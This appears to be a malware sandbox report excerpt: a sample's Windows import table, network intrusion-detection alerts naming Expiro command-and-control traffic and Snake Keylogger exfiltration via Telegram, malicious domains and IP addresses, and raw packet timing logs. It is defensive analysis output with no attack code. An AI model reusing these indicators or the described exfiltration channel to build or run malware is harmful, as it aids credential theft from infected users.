KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll | AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll | StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll | GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll | LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
Language of compilation system | Country where language is spoken | Map
English | Great Britain |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-10T16:24:14.594215+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 54.244.188.177 | 80 | 192.168.2.7 | 49702 | TCP
2024-12-10T16:24:14.594215+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 54.244.188.177 | 80 | 192.168.2.7 | 49702 | TCP
2024-12-10T16:24:16.280523+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.7 | 49708 | 193.122.6.168 | 80 | TCP
2024-12-10T16:24:17.429865+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 18.141.10.107 | 80 | 192.168.2.7 | 49709 | TCP
2024-12-10T16:24:17.429865+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 18.141.10.107 | 80 | 192.168.2.7 | 49709 | TCP
2024-12-10T16:24:19.430559+0100 | 2850851 | ETPRO MALWARE Win32/Expiro.NDO CnC Activity | 1 | 192.168.2.7 | 49716 | 54.244.188.177 | 80 | TCP
2024-12-10T16:24:22.325560+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 44.221.84.105 | 80 | 192.168.2.7 | 49727 | TCP
2024-12-10T16:24:22.325560+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 44.221.84.105 | 80 | 192.168.2.7 | 49727 | TCP
2024-12-10T16:24:22.340004+0100 | 2051648 | ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) | 1 | 192.168.2.7 | 64298 | 1.1.1.1 | 53 | UDP
2024-12-10T16:24:24.389865+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.7 | 49708 | 193.122.6.168 | 80 | TCP
2024-12-10T16:24:26.952913+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.7 | 49736 | 149.154.167.220 | 443 | TCP
2024-12-10T16:24:28.998498+0100 | 2051649 | ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) | 1 | 192.168.2.7 | 63892 | 1.1.1.1 | 53 | UDP
2024-12-10T16:25:41.188310+0100 | 2850851 | ETPRO MALWARE Win32/Expiro.NDO CnC Activity | 1 | 192.168.2.7 | 49872 | 82.112.184.197 | 80 | TCP
2024-12-10T16:26:07.491789+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 47.129.31.212 | 80 | 192.168.2.7 | 49966 | TCP
2024-12-10T16:26:07.491789+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 47.129.31.212 | 80 | 192.168.2.7 | 49966 | TCP
2024-12-10T16:26:10.308197+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 13.251.16.150 | 80 | 192.168.2.7 | 49972 | TCP
2024-12-10T16:26:10.308197+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 13.251.16.150 | 80 | 192.168.2.7 | 49972 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                  Dec 10, 2024 16:24:21.227498055 CET804972744.221.84.105192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:21.227607012 CET4972780192.168.2.744.221.84.105
                                                                                                                                                  Dec 10, 2024 16:24:21.235524893 CET4972780192.168.2.744.221.84.105
                                                                                                                                                  Dec 10, 2024 16:24:21.235548973 CET4972780192.168.2.744.221.84.105
                                                                                                                                                  Dec 10, 2024 16:24:21.354918957 CET804972744.221.84.105192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:21.354933977 CET804972744.221.84.105192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:22.325201988 CET804972744.221.84.105192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:22.325351000 CET4972780192.168.2.744.221.84.105
                                                                                                                                                  Dec 10, 2024 16:24:22.325560093 CET804972744.221.84.105192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:22.325835943 CET4972780192.168.2.744.221.84.105
                                                                                                                                                  Dec 10, 2024 16:24:22.444806099 CET804972744.221.84.105192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:22.960784912 CET4973480192.168.2.7172.234.222.138
                                                                                                                                                  Dec 10, 2024 16:24:23.080198050 CET8049734172.234.222.138192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:23.080302954 CET4973480192.168.2.7172.234.222.138
                                                                                                                                                  Dec 10, 2024 16:24:23.080528021 CET4973480192.168.2.7172.234.222.138
                                                                                                                                                  Dec 10, 2024 16:24:23.080619097 CET4973480192.168.2.7172.234.222.138
                                                                                                                                                  Dec 10, 2024 16:24:23.199898958 CET8049734172.234.222.138192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:23.200014114 CET8049734172.234.222.138192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:23.931077003 CET4970880192.168.2.7193.122.6.168
                                                                                                                                                  Dec 10, 2024 16:24:24.050472975 CET8049708193.122.6.168192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:24.217123032 CET8049734172.234.222.138192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:24.264908075 CET4973480192.168.2.7172.234.222.138
                                                                                                                                                  Dec 10, 2024 16:24:24.335911989 CET8049708193.122.6.168192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:24.389864922 CET4970880192.168.2.7193.122.6.168
                                                                                                                                                  Dec 10, 2024 16:24:24.850805044 CET49736443192.168.2.7149.154.167.220
                                                                                                                                                  Dec 10, 2024 16:24:24.850857019 CET44349736149.154.167.220192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:24.850922108 CET49736443192.168.2.7149.154.167.220
                                                                                                                                                  Dec 10, 2024 16:24:24.851960897 CET49736443192.168.2.7149.154.167.220
                                                                                                                                                  Dec 10, 2024 16:24:24.851983070 CET44349736149.154.167.220192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:25.057353973 CET4974180192.168.2.772.52.179.174
                                                                                                                                                  Dec 10, 2024 16:24:25.179490089 CET804974172.52.179.174192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:25.179574013 CET4974180192.168.2.772.52.179.174
                                                                                                                                                  Dec 10, 2024 16:24:25.179752111 CET4974180192.168.2.772.52.179.174
                                                                                                                                                  Dec 10, 2024 16:24:25.299043894 CET804974172.52.179.174192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:26.232204914 CET44349736149.154.167.220192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:26.232698917 CET49736443192.168.2.7149.154.167.220
                                                                                                                                                  Dec 10, 2024 16:24:26.234596968 CET49736443192.168.2.7149.154.167.220
                                                                                                                                                  Dec 10, 2024 16:24:26.234607935 CET44349736149.154.167.220192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:26.234952927 CET44349736149.154.167.220192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:26.236915112 CET49736443192.168.2.7149.154.167.220
                                                                                                                                                  Dec 10, 2024 16:24:26.283333063 CET44349736149.154.167.220192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:26.283406019 CET49736443192.168.2.7149.154.167.220
                                                                                                                                                  Dec 10, 2024 16:24:26.283418894 CET44349736149.154.167.220192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:26.348642111 CET804974172.52.179.174192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:26.446080923 CET4974180192.168.2.772.52.179.174
                                                                                                                                                  Dec 10, 2024 16:24:26.788472891 CET4974580192.168.2.776.223.26.96
                                                                                                                                                  Dec 10, 2024 16:24:26.907721043 CET804974576.223.26.96192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:26.907799006 CET4974580192.168.2.776.223.26.96
                                                                                                                                                  Dec 10, 2024 16:24:26.908724070 CET4974580192.168.2.776.223.26.96
                                                                                                                                                  Dec 10, 2024 16:24:26.952945948 CET44349736149.154.167.220192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:26.953474045 CET44349736149.154.167.220192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:26.953552008 CET49736443192.168.2.7149.154.167.220
                                                                                                                                                  Dec 10, 2024 16:24:26.953963041 CET49736443192.168.2.7149.154.167.220
                                                                                                                                                  Dec 10, 2024 16:24:27.028012037 CET804974576.223.26.96192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:28.200849056 CET804974576.223.26.96192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:28.201351881 CET804974576.223.26.96192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:28.201412916 CET4974580192.168.2.776.223.26.96
                                                                                                                                                  Dec 10, 2024 16:24:28.202661991 CET804974576.223.26.96192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:28.202676058 CET804974576.223.26.96192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:28.202718973 CET4974580192.168.2.776.223.26.96
                                                                                                                                                  Dec 10, 2024 16:24:28.205384970 CET804974576.223.26.96192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:28.205398083 CET804974576.223.26.96192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:28.205440998 CET4974580192.168.2.776.223.26.96
                                                                                                                                                  Dec 10, 2024 16:24:28.208373070 CET804974576.223.26.96192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:28.208412886 CET804974576.223.26.96192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:28.208462000 CET4974580192.168.2.776.223.26.96
                                                                                                                                                  Dec 10, 2024 16:24:28.211345911 CET804974576.223.26.96192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:28.211359978 CET804974576.223.26.96192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:28.211404085 CET4974580192.168.2.776.223.26.96
                                                                                                                                                  Dec 10, 2024 16:24:28.320898056 CET804974576.223.26.96192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:28.321336031 CET804974576.223.26.96192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:28.322058916 CET4974580192.168.2.776.223.26.96
                                                                                                                                                  Dec 10, 2024 16:24:28.440660000 CET804974576.223.26.96192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:28.440675974 CET804974576.223.26.96192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:28.440834045 CET4974580192.168.2.776.223.26.96
                                                                                                                                                  Dec 10, 2024 16:24:28.496308088 CET804974576.223.26.96192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:28.568732977 CET4973480192.168.2.7172.234.222.138
                                                                                                                                                  Dec 10, 2024 16:24:28.568873882 CET4973480192.168.2.7172.234.222.138
                                                                                                                                                  Dec 10, 2024 16:24:28.626753092 CET4974580192.168.2.776.223.26.96
                                                                                                                                                  Dec 10, 2024 16:24:28.689446926 CET8049734172.234.222.138192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:28.689462900 CET8049734172.234.222.138192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:28.750345945 CET4973480192.168.2.7172.234.222.138
                                                                                                                                                  Dec 10, 2024 16:24:29.910882950 CET4975680192.168.2.718.141.10.107
                                                                                                                                                  Dec 10, 2024 16:24:30.030323982 CET804975618.141.10.107192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:30.030510902 CET4975680192.168.2.718.141.10.107
                                                                                                                                                  Dec 10, 2024 16:24:30.030884027 CET4975680192.168.2.718.141.10.107
                                                                                                                                                  Dec 10, 2024 16:24:30.031089067 CET4975680192.168.2.718.141.10.107
                                                                                                                                                  Dec 10, 2024 16:24:30.151407003 CET804975618.141.10.107192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:30.151711941 CET804975618.141.10.107192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:32.045830965 CET804975618.141.10.107192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:32.045964003 CET804975618.141.10.107192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:32.046014071 CET4975680192.168.2.718.141.10.107
                                                                                                                                                  Dec 10, 2024 16:24:32.056807041 CET4975680192.168.2.718.141.10.107
                                                                                                                                                  Dec 10, 2024 16:24:32.177256107 CET804975618.141.10.107192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:33.639868975 CET4976380192.168.2.782.112.184.197
                                                                                                                                                  Dec 10, 2024 16:24:33.759186029 CET804976382.112.184.197192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:33.760617971 CET4976380192.168.2.782.112.184.197
                                                                                                                                                  Dec 10, 2024 16:24:33.760775089 CET4976380192.168.2.782.112.184.197
                                                                                                                                                  Dec 10, 2024 16:24:33.760775089 CET4976380192.168.2.782.112.184.197
                                                                                                                                                  Dec 10, 2024 16:24:33.880078077 CET804976382.112.184.197192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:33.880439043 CET804976382.112.184.197192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:55.667368889 CET804976382.112.184.197192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:55.667462111 CET4976380192.168.2.782.112.184.197
                                                                                                                                                  Dec 10, 2024 16:24:55.667503119 CET4976380192.168.2.782.112.184.197
                                                                                                                                                  Dec 10, 2024 16:24:55.708422899 CET4981580192.168.2.782.112.184.197
                                                                                                                                                  Dec 10, 2024 16:24:55.789789915 CET804976382.112.184.197192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:55.833307028 CET804981582.112.184.197192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:55.833385944 CET4981580192.168.2.782.112.184.197
                                                                                                                                                  Dec 10, 2024 16:24:55.833528042 CET4981580192.168.2.782.112.184.197
                                                                                                                                                  Dec 10, 2024 16:24:55.833553076 CET4981580192.168.2.782.112.184.197
                                                                                                                                                  Dec 10, 2024 16:24:55.953087091 CET804981582.112.184.197192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:55.953105927 CET804981582.112.184.197192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:25:17.746329069 CET804981582.112.184.197192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:25:17.749310017 CET4981580192.168.2.782.112.184.197
                                                                                                                                                  Dec 10, 2024 16:25:17.806333065 CET4981580192.168.2.782.112.184.197
                                                                                                                                                  Dec 10, 2024 16:25:17.925880909 CET804981582.112.184.197192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:25:19.098836899 CET4987280192.168.2.782.112.184.197
                                                                                                                                                  Dec 10, 2024 16:25:19.262886047 CET804987282.112.184.197192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:25:19.262975931 CET4987280192.168.2.782.112.184.197
                                                                                                                                                  Dec 10, 2024 16:25:19.263192892 CET4987280192.168.2.782.112.184.197
                                                                                                                                                  Dec 10, 2024 16:25:19.263308048 CET4987280192.168.2.782.112.184.197
                                                                                                                                                  Dec 10, 2024 16:25:19.425132990 CET804987282.112.184.197192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:25:19.425146103 CET804987282.112.184.197192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:25:29.336591005 CET8049708193.122.6.168192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:25:29.336682081 CET4970880192.168.2.7193.122.6.168
                                                                                                                                                  Dec 10, 2024 16:25:31.350153923 CET804974172.52.179.174192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:25:31.350229025 CET4974180192.168.2.772.52.179.174
                                                                                                                                                  Dec 10, 2024 16:25:31.350336075 CET4974180192.168.2.772.52.179.174
                                                                                                                                                  Dec 10, 2024 16:25:31.469614029 CET804974172.52.179.174192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:25:41.188249111 CET804987282.112.184.197192.168.2.7
Dec 10, 2024 16:25:41.188309908 CET | 49872 | 80 | 192.168.2.7 | 82.112.184.197
Dec 10, 2024 16:25:41.188911915 CET | 49872 | 80 | 192.168.2.7 | 82.112.184.197
Dec 10, 2024 16:25:41.196644068 CET | 49916 | 80 | 192.168.2.7 | 82.112.184.197
Dec 10, 2024 16:25:41.308339119 CET | 80 | 49872 | 82.112.184.197 | 192.168.2.7
Dec 10, 2024 16:25:41.316071987 CET | 80 | 49916 | 82.112.184.197 | 192.168.2.7
Dec 10, 2024 16:25:41.316159964 CET | 49916 | 80 | 192.168.2.7 | 82.112.184.197
Dec 10, 2024 16:25:41.324840069 CET | 49916 | 80 | 192.168.2.7 | 82.112.184.197
Dec 10, 2024 16:25:41.324919939 CET | 49916 | 80 | 192.168.2.7 | 82.112.184.197
Dec 10, 2024 16:25:41.444447041 CET | 80 | 49916 | 82.112.184.197 | 192.168.2.7
Dec 10, 2024 16:25:41.444581985 CET | 80 | 49916 | 82.112.184.197 | 192.168.2.7
Dec 10, 2024 16:25:58.687853098 CET | 49708 | 80 | 192.168.2.7 | 193.122.6.168
Dec 10, 2024 16:25:58.807357073 CET | 80 | 49708 | 193.122.6.168 | 192.168.2.7
Dec 10, 2024 16:26:03.215996981 CET | 80 | 49916 | 82.112.184.197 | 192.168.2.7
Dec 10, 2024 16:26:03.216077089 CET | 49916 | 80 | 192.168.2.7 | 82.112.184.197
Dec 10, 2024 16:26:04.099107027 CET | 49745 | 80 | 192.168.2.7 | 76.223.26.96
Dec 10, 2024 16:26:04.115169048 CET | 49916 | 80 | 192.168.2.7 | 82.112.184.197
Dec 10, 2024 16:26:04.220069885 CET | 80 | 49745 | 76.223.26.96 | 192.168.2.7
Dec 10, 2024 16:26:04.220127106 CET | 49745 | 80 | 192.168.2.7 | 76.223.26.96
Dec 10, 2024 16:26:04.234675884 CET | 80 | 49916 | 82.112.184.197 | 192.168.2.7
Dec 10, 2024 16:26:04.754178047 CET | 49966 | 80 | 192.168.2.7 | 47.129.31.212
Dec 10, 2024 16:26:04.873568058 CET | 80 | 49966 | 47.129.31.212 | 192.168.2.7
Dec 10, 2024 16:26:04.873647928 CET | 49966 | 80 | 192.168.2.7 | 47.129.31.212
Dec 10, 2024 16:26:04.881828070 CET | 49966 | 80 | 192.168.2.7 | 47.129.31.212
Dec 10, 2024 16:26:04.881864071 CET | 49966 | 80 | 192.168.2.7 | 47.129.31.212
Dec 10, 2024 16:26:05.001605034 CET | 80 | 49966 | 47.129.31.212 | 192.168.2.7
Dec 10, 2024 16:26:05.001617908 CET | 80 | 49966 | 47.129.31.212 | 192.168.2.7
Dec 10, 2024 16:26:06.959920883 CET | 80 | 49966 | 47.129.31.212 | 192.168.2.7
Dec 10, 2024 16:26:06.959955931 CET | 80 | 49966 | 47.129.31.212 | 192.168.2.7
Dec 10, 2024 16:26:06.960016966 CET | 49966 | 80 | 192.168.2.7 | 47.129.31.212
Dec 10, 2024 16:26:07.243092060 CET | 49966 | 80 | 192.168.2.7 | 47.129.31.212
Dec 10, 2024 16:26:07.491789103 CET | 80 | 49966 | 47.129.31.212 | 192.168.2.7
Dec 10, 2024 16:26:07.978811979 CET | 49972 | 80 | 192.168.2.7 | 13.251.16.150
Dec 10, 2024 16:26:08.098170996 CET | 80 | 49972 | 13.251.16.150 | 192.168.2.7
Dec 10, 2024 16:26:08.098263979 CET | 49972 | 80 | 192.168.2.7 | 13.251.16.150
Dec 10, 2024 16:26:08.098440886 CET | 49972 | 80 | 192.168.2.7 | 13.251.16.150
Dec 10, 2024 16:26:08.098464966 CET | 49972 | 80 | 192.168.2.7 | 13.251.16.150
Dec 10, 2024 16:26:08.218617916 CET | 80 | 49972 | 13.251.16.150 | 192.168.2.7
Dec 10, 2024 16:26:08.218683958 CET | 80 | 49972 | 13.251.16.150 | 192.168.2.7
Dec 10, 2024 16:26:10.184322119 CET | 80 | 49972 | 13.251.16.150 | 192.168.2.7
Dec 10, 2024 16:26:10.184428930 CET | 80 | 49972 | 13.251.16.150 | 192.168.2.7
Dec 10, 2024 16:26:10.184497118 CET | 49972 | 80 | 192.168.2.7 | 13.251.16.150
Dec 10, 2024 16:26:10.186763048 CET | 49972 | 80 | 192.168.2.7 | 13.251.16.150
Dec 10, 2024 16:26:10.308197021 CET | 80 | 49972 | 13.251.16.150 | 192.168.2.7
Dec 10, 2024 16:26:10.788422108 CET | 49978 | 80 | 192.168.2.7 | 44.221.84.105
Dec 10, 2024 16:26:10.911365032 CET | 80 | 49978 | 44.221.84.105 | 192.168.2.7
Dec 10, 2024 16:26:10.914324045 CET | 49978 | 80 | 192.168.2.7 | 44.221.84.105
Dec 10, 2024 16:26:10.914565086 CET | 49978 | 80 | 192.168.2.7 | 44.221.84.105
Dec 10, 2024 16:26:10.914565086 CET | 49978 | 80 | 192.168.2.7 | 44.221.84.105
Dec 10, 2024 16:26:11.153440952 CET | 80 | 49978 | 44.221.84.105 | 192.168.2.7
